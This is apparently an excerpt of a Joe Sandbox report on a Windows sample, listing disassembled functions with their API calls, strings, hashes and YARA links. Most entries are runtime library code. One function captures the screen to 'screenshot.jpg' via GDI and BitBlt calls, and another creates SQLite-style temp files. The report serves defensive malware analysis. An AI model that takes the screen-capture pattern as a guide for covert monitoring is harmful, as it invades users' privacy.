Instruction Fuzzy Hash: D641A230B091059BCB24DE68C9C096A73B6EB85704720497EF801EB391D778FD15CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 0042211F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?), ref: 0042216F
GetTempPathA.KERNEL32(000000E6,?), ref: 004221A1
_free.LIBCMT ref: 004221C9

Strings

etilqs_, xrefs: 004221D1
%s\etilqs_, xrefs: 00422220

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: PathTemp$_free
String ID: %s\etilqs_$etilqs_
API String ID: 2736257537-1420421710
Opcode ID: 7d548c8dc1c5a541ad7efe48bb902939b9e86837a8b3d77f2607904708cbd953
Instruction ID: d585e1698a6b4d860113f1833a4f2778aa4d03c4bf214d4a0c8b6d5d043bd734
Opcode Fuzzy Hash: 7d548c8dc1c5a541ad7efe48bb902939b9e86837a8b3d77f2607904708cbd953
Instruction Fuzzy Hash: 7F314A71600559FAE710EBB5AC41FFA375C9B55308F9040AFB904D6182EBBC9E848BB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C174 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040C17B
GetProcessHeap.KERNEL32(00000008,?,0000005C), ref: 0040C214
HeapAlloc.KERNEL32(00000000), ref: 0040C21B
_strcpy_s.LIBCMT ref: 0040C266

Strings

0123456789ABCDEF, xrefs: 0040C186

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Heap$AllocH_prolog3_Process_strcpy_s
String ID: 0123456789ABCDEF
API String ID: 794038625-2554083253
Opcode ID: 497ccb1a367f29b1b3b8922f187ce65a3b718ae2de30ae77ab19090cb02ef9aa
Instruction ID: b747bfdb3e26193e5073a1d084651993681beb49fc9452530fa918e7e3566cd0
Opcode Fuzzy Hash: 497ccb1a367f29b1b3b8922f187ce65a3b718ae2de30ae77ab19090cb02ef9aa
Instruction Fuzzy Hash: AF31B0729002159FDB01DFA8CC98AAE77B9AF09304F10426AF815FF2D2DB799D09CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B144 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040B18B
std::_Xinvalid_argument.LIBCPMT ref: 0040B1A2
_memmove.LIBCMT ref: 0040B20A

Strings

invalid string position, xrefs: 0040B186
string too long, xrefs: 0040B19D

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 4be8ca101ca7d41bd833dd75729df86d39a24cdf619d8391ba1987fec0c76551
Instruction ID: ca1577c40bf50f344d1b6253b70abaa0be89c05305f84e21aa8aac203a4b7ade
Opcode Fuzzy Hash: 4be8ca101ca7d41bd833dd75729df86d39a24cdf619d8391ba1987fec0c76551
Instruction Fuzzy Hash: CC21A2313002049BCB249EA9CC9596F77A6EF81754B14093FF846AB3D1CB78EC1586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00451B51 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00451B68

Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571CE
Part of subcall function 004571B9: __CxxThrowException@8.LIBCMT ref: 004571E3
Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571F4

std::_Xinvalid_argument.LIBCPMT ref: 00451B7E
_memmove.LIBCMT ref: 00451BBF

Strings

invalid string position, xrefs: 00451B63
string too long, xrefs: 00451B79

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 2deb9e1340ddfcde8f6454e2f08a5093ae42ab8548e33497cb7b528a702bb593
Instruction ID: 0ba7ff7cfebcb35360f0e18273e3b4045ba51c9dc1168df922b79bd9da7465bf
Opcode Fuzzy Hash: 2deb9e1340ddfcde8f6454e2f08a5093ae42ab8548e33497cb7b528a702bb593
Instruction Fuzzy Hash: 5011B6717042009BDB249E5DDC81F6EB7E9EB81711B14061FF8429B7A3DB78BC488399

Uniqueness

Uniqueness Score: -1.00%

Function 00403678 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040368F

Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571CE
Part of subcall function 004571B9: __CxxThrowException@8.LIBCMT ref: 004571E3
Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571F4

std::_Xinvalid_argument.LIBCPMT ref: 004036B1
_memmove.LIBCMT ref: 004036EE

Strings

invalid string position, xrefs: 0040368A
string too long, xrefs: 004036AC

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 569e382352fe010c33a942c3fd9eb60eb0454e062419ea92c6a552ba41202482
Instruction ID: db178933d27d34acf3f82f697843d2ed3c4bcd28e49bacae176434ca69cb4fcc
Opcode Fuzzy Hash: 569e382352fe010c33a942c3fd9eb60eb0454e062419ea92c6a552ba41202482
Instruction Fuzzy Hash: DD118171300200ABD724DF58D881A5ABBE8EB05716B10493EF9569B382D775EA448798

Uniqueness

Uniqueness Score: -1.00%

Function 00407CC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00407CDD

Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571CE
Part of subcall function 004571B9: __CxxThrowException@8.LIBCMT ref: 004571E3
Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571F4

std::_Xinvalid_argument.LIBCPMT ref: 00407CFF
_memmove.LIBCMT ref: 00407D43

Strings

invalid string position, xrefs: 00407CD8
string too long, xrefs: 00407CFA

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: e9799768231b1a4746e23186deedf8f4384f767a441304c318dc2dc5d69e7dc8
Instruction ID: 60f7f1511ed924cbf4cf7fc11904100ccbbe8b278513fe5d5a4f8b9e66907575
Opcode Fuzzy Hash: e9799768231b1a4746e23186deedf8f4384f767a441304c318dc2dc5d69e7dc8
Instruction Fuzzy Hash: D711EB313085059BC714DE68D8C1D6EB3A9BF85718720452FF8169B2D1EB34F906C799

Uniqueness

Uniqueness Score: -1.00%

Function 00450C64 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00450C6E
GetSystemTime.KERNEL32(?,000000F4,00406E48,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 00450C8F
GetTimeZoneInformation.KERNEL32(?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 00450C9C
TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 00450CBF

Part of subcall function 0045349D: __EH_prolog3.LIBCMT ref: 004534A7

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Strings

UTC, xrefs: 00450CF7

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Time$System$H_prolog3H_prolog3_InformationLocalSpecificZone_memmove
String ID: UTC
API String ID: 473020483-2754919731
Opcode ID: 5aca16fe4a4199cd51760486653e25d5d3e8cfa3d078eef116ff70fda4ac0453
Instruction ID: 4cfc0ab9dcd27abcdb449df77c37694f41cdbec7603b479a03ecb408223a0980
Opcode Fuzzy Hash: 5aca16fe4a4199cd51760486653e25d5d3e8cfa3d078eef116ff70fda4ac0453
Instruction Fuzzy Hash: E4113D71950119FFDB51EBE4DC09BEDB778BF58305F0044AAE208F7050EB786A988B59

Uniqueness

Uniqueness Score: -1.00%

Function 0045E37E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 0045E391

Part of subcall function 0045E2EC: ___BuildCatchObjectHelper.LIBCMT ref: 0045E322

_UnwindNestedFrames.LIBCMT ref: 0045E3A8
___FrameUnwindToState.LIBCMT ref: 0045E3B6

Strings

csm, xrefs: 0045E380
csm, xrefs: 0045E38D, 0045E3A2, 0045E3B5, 0045E3D3, 0045E3E3

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: df13842e89a4ce1fc1dabfa91de2db28e72edde8206ccd2b2daebef66f8a3593
Instruction ID: 3bd7e3417733b5c318ec8a983b9b0d29420a24e3eec7d21bdaf542f73be6ff3a
Opcode Fuzzy Hash: df13842e89a4ce1fc1dabfa91de2db28e72edde8206ccd2b2daebef66f8a3593
Instruction Fuzzy Hash: 86014B31400109BBDF166F52CC45EAB3F6AEF08356F10401AFD1825122DB3A9AB5EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004513A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004513B0

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

GetTickCount.KERNEL32 ref: 004513BB

Part of subcall function 0045C0C3: __getptd.LIBCMT ref: 0045C0C8

_rand.LIBCMT ref: 004513D0

Part of subcall function 0045C0D5: __getptd.LIBCMT ref: 0045C0D5

_sprintf.LIBCMT ref: 004513E3

Strings

%s%d, xrefs: 004513DD

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID: %s%d
API String ID: 2210831635-1110647743
Opcode ID: c37e270dec90a3bffd32509fb4c9d67cee4e1b22fc0115de5770fcd6f3c5505c
Instruction ID: 0744540a29d3bbd398de7985f9ea8c8654731ea39c2247b7a95357496ec8bca5
Opcode Fuzzy Hash: c37e270dec90a3bffd32509fb4c9d67cee4e1b22fc0115de5770fcd6f3c5505c
Instruction Fuzzy Hash: 79E05C232057506AE22166EA5CC5B6B9648CFD1BA2F24045FF90487183DA9C4C444269

Uniqueness

Uniqueness Score: -1.00%

Function 0045159E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004515C1
GetSystemMetrics.USER32 ref: 004515CD
GetSystemMetrics.USER32 ref: 004515D4

Part of subcall function 0045152C: CreateCompatibleDC.GDI32(00000000), ref: 00451536
Part of subcall function 0045152C: GetDC.USER32(00000000), ref: 0045154C
Part of subcall function 0045152C: CreateCompatibleBitmap.GDI32(00000000), ref: 0045154F
Part of subcall function 0045152C: SelectObject.GDI32(?,00000000), ref: 0045155B
Part of subcall function 0045152C: GetDC.USER32(00000000), ref: 0045156D
Part of subcall function 0045152C: BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0045157B
Part of subcall function 0045152C: DeleteObject.GDI32(00000000), ref: 00451591

GdiplusShutdown.GDIPLUS(?), ref: 004515EC

Strings

screenshot.jpg, xrefs: 004515D6

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CompatibleCreateGdiplusMetricsObjectSystem$BitmapDeleteSelectShutdownStartup
String ID: screenshot.jpg
API String ID: 3709458919-673422685
Opcode ID: a24fc1beb796eac67e604aa53dac70b4aeabef61e02a1304ceb35c9ba57b22ae
Instruction ID: 076d8030bafb6e0a274f568acec5a58227ba77c466964dfdbe2f963778b77963
Opcode Fuzzy Hash: a24fc1beb796eac67e604aa53dac70b4aeabef61e02a1304ceb35c9ba57b22ae
Instruction Fuzzy Hash: DEF030B2D00108BACB10AB969C05DEFBFBCEFC0714F00005AF904A2153D77556459BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0045AF90 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AFEB
_memcpy_s.LIBCMT ref: 0045B05C
__read.LIBCMT ref: 0045B0BF
__filbuf.LIBCMT ref: 0045B0DB

Part of subcall function 0045E9AD: __getptd_noexit.LIBCMT ref: 0045E9AD

_memset.LIBCMT ref: 0045B11C

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 5c86759c035fa130425e623b89af6440da6e3980b064e03ff7aa97f44c478e26
Instruction ID: d79fb354a43681be87c3e1b700cacc3705cd43efb4160100d91a85dbd4a56604
Opcode Fuzzy Hash: 5c86759c035fa130425e623b89af6440da6e3980b064e03ff7aa97f44c478e26
Instruction Fuzzy Hash: 2A51F971A00705EBCB208F7AC84465FB7B1EF40766F24821BEC30562D2D7789E59CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00427331 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,00000003,00000000,?,?,00000000,00000000,00000000,?), ref: 00427428
CreateFileA.KERNEL32(?,?,00000003,00000000,?,?,00000000,00000000,00000000,?), ref: 0042743E
GetLastError.KERNEL32 ref: 0042744D
_free.LIBCMT ref: 00427459

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CreateFile$ErrorLast_free
String ID:
API String ID: 3757615552-0
Opcode ID: 06844cd884bad69f424dd224fe7b668333840d09536f60168d0437294947024e
Instruction ID: e9be003d047a5e0a70a8e00792538486cbb4f0747798cf8e08941834d50fe3c3
Opcode Fuzzy Hash: 06844cd884bad69f424dd224fe7b668333840d09536f60168d0437294947024e
Instruction Fuzzy Hash: 11516C71A043189FDB209FB9EC41B9EBAB6BF48314F60452EE919EB291DB749940CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00455064 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004550B8
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004550F2

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: cb9acada1b0150920df6ceec45254c254bb13a0933d5437cd5d4c7e10c7b4061
Instruction ID: 9d44a93b58539ecf8f686cb4e257fa4a59bf08a93e47bab95b7e58e279a8b0ff
Opcode Fuzzy Hash: cb9acada1b0150920df6ceec45254c254bb13a0933d5437cd5d4c7e10c7b4061
Instruction Fuzzy Hash: C3319370900F04AFDB309F258C94B377FE4E714356F108A2FF99686642D374AC898B59

Uniqueness

Uniqueness Score: -1.00%

Function 00416399 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 004163E8
_free.LIBCMT ref: 0041642F

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AttributesFile_free
String ID:
API String ID: 2296893129-0
Opcode ID: 3cefa5c506df4455825124aa30a46bc2b45870dbb50c649c45490e9fa666d715
Instruction ID: 61837fdb0766dc940bcc6c3c42216d9c6b92045a8079ce2473fc20e8948a950a
Opcode Fuzzy Hash: 3cefa5c506df4455825124aa30a46bc2b45870dbb50c649c45490e9fa666d715
Instruction Fuzzy Hash: 3F219431904218DFCB209F68D8415EFB7A5EB48724F12452BF816E3281DB38D980CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0045A0BE Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0045A0CC

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

_free.LIBCMT ref: 0045A0DF

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: d4f526980652f2dbd311c24368c882e418cc3eca192eee685cbf58b35295a360
Instruction ID: 6c93584c00c778ec45f65c880b568c136556c656d3516fddbf5cbe6b517d68e9
Opcode Fuzzy Hash: d4f526980652f2dbd311c24368c882e418cc3eca192eee685cbf58b35295a360
Instruction Fuzzy Hash: 2C110B32400A01DBCB252F769C0461B37559FC0767F20462BFD8896253DB3C8959D65E

Uniqueness

Uniqueness Score: -1.00%

Function 00415CBD Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00415CC5
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00415CE3
_malloc.LIBCMT ref: 00415CE9

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00415D07
_free.LIBCMT ref: 00415D10

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
String ID:
API String ID: 2559239037-0
Opcode ID: bfeca5fad53fd818770a20c5ca11d46e0b6ed9c1c0c34e40fe4a93c8003eed43
Instruction ID: 25aea6f3a85c2588f3ce44b99e05fd1ede59350c621fe352a36fba0d85f6a344
Opcode Fuzzy Hash: bfeca5fad53fd818770a20c5ca11d46e0b6ed9c1c0c34e40fe4a93c8003eed43
Instruction Fuzzy Hash: 2AF081B150411DFEAB016BA9ACC8CFF7E6CEA853A8720022AF405D2190D7344E8196B8

Uniqueness

Uniqueness Score: -1.00%

Function 00463A71 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00463A7D

Part of subcall function 0045EE42: __getptd_noexit.LIBCMT ref: 0045EE45
Part of subcall function 0045EE42: __amsg_exit.LIBCMT ref: 0045EE52

__getptd.LIBCMT ref: 00463A94
__amsg_exit.LIBCMT ref: 00463AA2
__lock.LIBCMT ref: 00463AB2
__updatetlocinfoEx_nolock.LIBCMT ref: 00463AC6

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 0b1c56587121f15adda9766aa2272af08bf0081e2fb31824f1821a77b0234ebb
Instruction ID: ed3798c310441edc574c028e5b207aad81a9e5e8b132f30a50b92db4ccd554e7
Opcode Fuzzy Hash: 0b1c56587121f15adda9766aa2272af08bf0081e2fb31824f1821a77b0234ebb
Instruction Fuzzy Hash: C1F09632A007109AD720BFAA9807B4E7390AF0072BF14455FF881672D3DB6C5A49AB5F

Uniqueness

Uniqueness Score: -1.00%

Function 0045217B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 399COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00452185

Part of subcall function 0040241C: std::locale::facet::_Incref.LIBCPMT ref: 0040242F

Part of subcall function 00451D57: __EH_prolog3.LIBCMT ref: 00451D5E
Part of subcall function 00451D57: std::_Lockit::_Lockit.LIBCPMT ref: 00451D68
Part of subcall function 00451D57: int.LIBCPMT ref: 00451D7F
Part of subcall function 00451D57: std::locale::_Getfacet.LIBCPMT ref: 00451D88

_localeconv.LIBCMT ref: 0045222D
_strcspn.LIBCMT ref: 00452335

Strings

e, xrefs: 0045223F

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: GetfacetH_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::_std::locale::facet::_
String ID: e
API String ID: 3634193280-4024072794
Opcode ID: f85d47aaeb65c75eb06d376a0ab9dd4d5e319b6246058adae964f0e85ec8a212
